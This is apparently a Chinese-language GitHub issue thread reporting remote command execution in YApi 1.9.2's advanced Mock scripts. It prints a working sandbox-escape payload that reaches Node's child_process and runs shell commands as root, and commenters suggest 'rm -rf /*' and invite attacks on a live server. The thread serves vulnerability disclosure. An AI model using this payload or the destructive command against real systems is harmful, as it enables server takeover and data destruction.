高级Mock可以获取到系统操作权限

[Loushangkeji]

版本号

~
1.9.2

什么问题

~
高级Mock可以获取到系统操作权限

如何复现此问题

~
在接口中文档中 添入如下 mock 脚本

const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("whoami && ps -ef").toString()

保存后，直接请求 对应的 Mock 地址
Mock地址：http://xxxx/mock/77/xxxxx
可以看到如下信息

root
root      2525     1  0 Jan26 ?        00:02:23 xxxxx
root      3694     1  0 Jan06 ?        00:10:59 aaaaaa
root      7046     1  0  2020 ?        06:46:50 bbbbbb
root      8073     1  0  2020 ?        01:21:46 cccccc

什么浏览器

~
chrome

什么系统（Linux, Windows, macOS）

centOS 7

[Loushangkeji]

虽然作者停止维护了，但是还是希望作者把这个安全漏洞修复一下。感谢

[WangJi]

安全因素主要来自于开放注册
see 如何禁止注册

[LouShangxiaolong]

安全因素主要来自于开放注册
see 如何禁止注册

感谢。
但是漏洞本身才是安全问题的主要因素。

[quarter-life]

安全因素主要来自于开放注册
see 如何禁止注册

感觉这个漏洞并不是主要来源开放注册，如果只是一个人使用那么这个漏洞也无从说起，但是该漏洞代表所有账户中有权限建立接口的人都能操作部署Yapi的服务器，那么已经存在的账户，每个团队成员都是隐患。

[JaneYork]

安全因素主要来自于开放注册
see 如何禁止注册

如果关闭注册，那么第二个问题来了，管理员如何新增新用户？
#409 (comment)

[JaneYork]

如果真的是这样，那就太危险了。
另外问下，你们是怎么处理用户注册和新增用户的？LDAP？

[JaneYork]

如果真的是这样，那就太危险了。
另外问下，你们是怎么处理用户注册和新增用户的？LDAP？

@Loushangkeji

[JaneYork]

还真的如此，但是本质原因在哪里呢，是代码漏洞，还是安装的时候使用root权限？
欢迎大家访问操作我
http://101.91.214.203:81/mock/16/v2/woshipogaizai

[LouShangxiaolong]

目前采用的是LDAP。
然后这个应该算是代码漏洞吧，没有过滤掉一些敏感操作。
和使用什么账号安装没有关系，只要启动服务的时候用的哪个账号，mock就能只用哪个账号的权限了。

[LouShangxiaolong]

还真的如此，但是本质原因在哪里呢，是代码漏洞，还是安装的时候使用root权限？
欢迎大家访问操作我
http://101.91.214.203:81/mock/16/v2/woshipogaizai

能获取你的所有信息，只要改改mock的话就能直接操作你的服务器了

[JaneYork]

目前采用的是LDAP。
然后这个应该算是代码漏洞吧，没有过滤掉一些敏感操作。
和使用什么账号安装没有关系，只要启动服务的时候用的哪个账号，mock就能只用哪个账号的权限了。

还有其他高级mock脚本吗，执行shell命令，越危险越好，我试试，在1.3.2版本，高级mock目前不会有问题

[LouShangxiaolong]

目前采用的是LDAP。
然后这个应该算是代码漏洞吧，没有过滤掉一些敏感操作。
和使用什么账号安装没有关系，只要启动服务的时候用的哪个账号，mock就能只用哪个账号的权限了。

还有其他高级mock脚本吗，执行shell命令，越危险越好，我试试，在1.3.2版本，高级mock目前不会有问题

rm -rf /* 还不够危险吗

[LouShangxiaolong]

目前采用的是LDAP。
然后这个应该算是代码漏洞吧，没有过滤掉一些敏感操作。
和使用什么账号安装没有关系，只要启动服务的时候用的哪个账号，mock就能只用哪个账号的权限了。

还有其他高级mock脚本吗，执行shell命令，越危险越好，我试试，在1.3.2版本，高级mock目前不会有问题

你可以随意更改为你认为危险的sell命令啊

[JaneYork]

目前采用的是LDAP。
然后这个应该算是代码漏洞吧，没有过滤掉一些敏感操作。
和使用什么账号安装没有关系，只要启动服务的时候用的哪个账号，mock就能只用哪个账号的权限了。

还有其他高级mock脚本吗，执行shell命令，越危险越好，我试试，在1.3.2版本，高级mock目前不会有问题

你可以随意更改为你认为危险的sell命令啊

不会啊，我改成reboot命令，执行，{"errcode":404,"errmsg":"不存在的api, 当前请求path为 /shell-top， 请求方法为 GET ，请确认是否定义此请求。","data":null}是不是child_process返回执行必须是json格式？还是说你的Mock脚本是个例外。
你给我来个危险的，或者随便改个mkdir，我操作试试。
还有啊，LDAP你是用命令管理还是可视化PHPLDAP管理的？

@Loushangkeji

[JaneYork]

目前采用的是LDAP。
然后这个应该算是代码漏洞吧，没有过滤掉一些敏感操作。
和使用什么账号安装没有关系，只要启动服务的时候用的哪个账号，mock就能只用哪个账号的权限了。

还有其他高级mock脚本吗，执行shell命令，越危险越好，我试试，在1.3.2版本，高级mock目前不会有问题

你可以随意更改为你认为危险的sell命令啊

不会啊，我改成reboot命令，执行，{"errcode":404,"errmsg":"不存在的api, 当前请求path为 /shell-top， 请求方法为 GET ，请确认是否定义此请求。","data":null}是不是child_process返回执行必须是json格式？还是说你的Mock脚本是个例外。
你给我来个危险的，或者随便改个mkdir，我操作试试。
还有啊，LDAP你是用命令管理还是可视化PHPLDAP管理的？

@Loushangkeji

莫非，shell命令已经执行了，只是yapi返回解析错误？